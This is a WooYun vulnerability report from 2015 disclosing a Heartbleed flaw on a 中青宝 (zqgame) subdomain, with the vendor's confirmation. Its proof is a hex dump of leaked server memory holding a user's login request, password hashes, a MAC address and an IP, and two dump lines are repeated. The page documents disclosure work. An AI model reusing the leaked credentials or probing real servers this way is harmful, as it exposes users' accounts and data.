当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0123497

漏洞标题:中青宝某分站Heartbleed漏洞

相关厂商:中青宝互动网络股份有限公司

漏洞作者: 紫霞仙子

提交时间:2015-06-29 17:35

修复时间:2015-08-13 17:58

公开时间:2015-08-13 17:58

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-29: 细节已通知厂商并且等待厂商处理中
2015-06-29: 厂商已经确认,细节仅向厂商公开
2015-07-09: 细节向核心白帽子及相关领域专家公开
2015-07-19: 细节向普通白帽子公开
2015-07-29: 细节向实习白帽子公开
2015-08-13: 细节向公众公开

简要描述:

233

详细说明:

weixin.zqgame.com

漏洞证明:

Connecting...
Sending Client Hello...
Waiting for Server Hello...
 ... received message: type = 22, ver = 0302, length = 66
 ... received message: type = 22, ver = 0302, length = 1510
 ... received message: type = 22, ver = 0302, length = 331
 ... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
 ... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
  0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C  .@....SC[...r...
  0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90  .+..H...9.......
  0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0  .w.3....f.....".
  0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00  !.9.8.........5.
  0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0  ................
  0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00  ............3.2.
  0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00  ....E.D...../...
  0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00  A...............
  0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01  ................
  0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00  ..I...........4.
  00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00  2...............
  00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00  ................
  00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00  ................
  00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 54 4D 4C 2C  ....#.......TML,
  00e0: 20 6C 69 6B 65 20 47 65 63 6B 6F 29 20 43 68 72   like Gecko) Chr
  00f0: 6F 6D 65 2F 33 31 2E 30 2E 31 36 35 30 2E 36 33  ome/31.0.1650.63
  0100: 20 53 61 66 61 72 69 2F 35 33 37 2E 33 36 22 0A   Safari/537.36".
  0110: 01 00 00 00 00 00 00 00 47 45 54 20 2F 6C 6F 67  ........GET /log
  0120: 69 6E 2F 31 2E 30 2F 6E 61 6D 65 3D 71 61 7A 71  in/1.0/name=qazq
  0130: 77 65 61 7A 61 73 64 7A 78 63 26 4D 44 35 3D 31  weazasdzxc&MD5=1
  0140: 32 64 33 37 33 35 61 37 31 38 36 63 32 33 34 65  2d3735a7186c234e
  0150: 61 64 36 35 61 31 63 32 64 32 64 35 31 36 66 26  ad65a1c2d2d516f&
  0160: 53 48 41 31 3D 66 63 35 39 34 66 36 38 65 33 31  SHA1=fc594f68e31
  0170: 37 33 34 35 31 31 32 62 32 62 31 31 35 34 30 34  7345112b2b115404
  0180: 64 33 61 35 66 34 61 34 31 35 34 32 61 26 61 64  d3a5f4a41542a&ad
  0190: 76 65 72 69 6E 66 6F 3D 72 77 26 6D 61 63 3D 39  verinfo=rw&mac=9
  01a0: 38 3A 36 63 3A 66 35 3A 36 34 3A 35 33 3A 36 38  8:6c:f5:64:53:68
  01b0: 2F 31 35 34 2F 38 37 33 33 65 62 61 30 30 61 61  /154/8733eba00aa
  01c0: 61 31 38 34 38 37 64 39 32 30 35 32 63 38 39 36  a18487d92052c896
  01d0: 31 62 34 63 30 34 65 31 61 30 36 34 66 2F 31 34  1b4c04e1a064f/14
  01e0: 33 35 35 34 34 36 30 35 31 38 39 2F 30 2F 33 62  35544605189/0/3b
 01d0: 31 62 34 63 30 34 65 31 61 30 36 34 66 2F 31 34  1b4c04e1a064f/14
  01e0: 33 35 35 34 34 36 30 35 31 38 39 2F 30 2F 33 62  35544605189/0/3b
  01f0: 64 32 39 64 64 31 61 36 39 65 62 35 64 62 33 31  d29dd1a69eb5db31
  0200: 32 64 32 31 63 65 38 62 34 30 32 35 31 36 62 36  2d21ce8b402516b6
  0210: 65 31 36 38 35 36 20 48 54 54 50 2F 31 2E 30 0D  e16856 HTTP/1.0.
  0220: 0A 58 2D 52 65 61 6C 2D 49 50 3A 20 31 32 35 2E  .X-Real-IP: 125.
  0230: 37 31 2E 32 30 39 2E 31 30 38 0D 0A 48 6F 73 74  71.209.108..Host
  0240: 3A 20 70 6C 61 74 66 6F 72 6D 2E 61 70 69 2E 7A  : platform.api.z
  0250: 71 67 61 6D 65 2E 63 6F 6D 0D 0A 58 2D 46 6F 72  qgame.com..X-For
  0260: 77 61 72 64 65 64 2D 46 6F 72 3A 20 31 32 35 2E  warded-For: 125.
  0270: 37 31 2E 32 30 39 2E 31 30 38 0D 0A 58 2D 46 6F  71.209.108..X-Fo
  0280: 72 77 61 72 64 65 64 2D 46 6F 72 3A 20 31 32 35  rwarded-For: 125
  0290: 2E 37 31 2E 32 30 39 2E 31 30 38 0D 0A 43 6F 6E  .71.209.108..Con
  02a0: 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A  nection: close..
  02b0: 0D 0A 67 00 00 00 00 00 00 00 00 00 00 00 00 00  ..g.............
  02c0: 00 00 00 00 00 00 00 00 C8 00 00 00 00 00 00 00  ................
  02d0: 01 00 00 00 00 00 00 00 99 FC FF FF FF FF FF FF  ................
  02e0: AC 00 00 00 00 00 00 00 30 62 41 01 00 00 00 00  ........0bA.....
  02f0: 00 00 00 00 00 00 00 00 90 0C 41 01 00 00 00 00  ..........A.....
  0300: 00 00 00 00 00 00 00 00 E0 5D 41 01 00 00 00 00  .........]A.....
  0310: 0B 00 00 00 00 00 00 00 88 CB 3F 01 00 00 00 00  ..........?.....
  0320: 00 04 00 00 00 00 00 00 20 21 41 01 00 00 00 00  ........ !A.....
  0330: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  0340: E0 59 2F 01 00 00 00 00 AE EF 2E 00 00 00 00 00  .Y/.............
  0350: 04 00 00 00 00 00 00 00 30 CD 3F 01 00 00 00 00  ........0.?.....
  0360: 1D 00 00 00 00 00 00 00 35 CD 3F 01 00 00 00 00  ........5.?.....
  0370: 53 CD 3F 01 00 00 00 00 BA 26 7B BC 3D 82 C7 F0  S.?......&{.=...
  0380: 0E 00 00 00 00 00 00 00 57 CD 3F 01 00 00 00 00  ........W.?.....
  0390: 03 00 00 00 00 00 00 00 66 CD 3F 01 00 00 00 00  ........f.?.....
  03a0: 6A CD 3F 01 00 00 00 00 15 A9 2F 00 00 00 00 00  j.?......./.....
  03b0: 04 00 00 00 00 00 00 00 78 CD 3F 01 00 00 00 00  ........x.?.....
  03c0: 2A 00 00 00 00 00 00 00 7D CD 3F 01 00 00 00 00  *.......}.?.....
  03d0: A8 CD 3F 01 00 00 00 00 0E 60 D4 2E 0E 8D 36 24  ..?......`....6$
  03e0: 0C 00 00 00 00 00 00 00 AC CD 3F 01 00 00 00 00  ..........?.....
  03f0: 18 00 00 00 00 00 00 00 B9 CD 3F 01 00 00 00 00  ..........?.....
  0400: D2 CD 3F 01 00 00 00 00 00 00 00 00 00 00 00 00  ..?.............
  0410: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  0420: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  0430: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  0440: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  0450: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
可以看到,能抓到用户名和md5(密码),X-Forwarded-For IP信息。
多抓几次,可以抓到大量敏感信息,

修复方案:

~~

版权声明:转载请注明来源 紫霞仙子@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-06-29 17:57

厂商回复:

非常感谢您的反馈,经测试漏洞确实存在。我们会尽快修复~

最新状态:

暂无

漏洞评价:

评论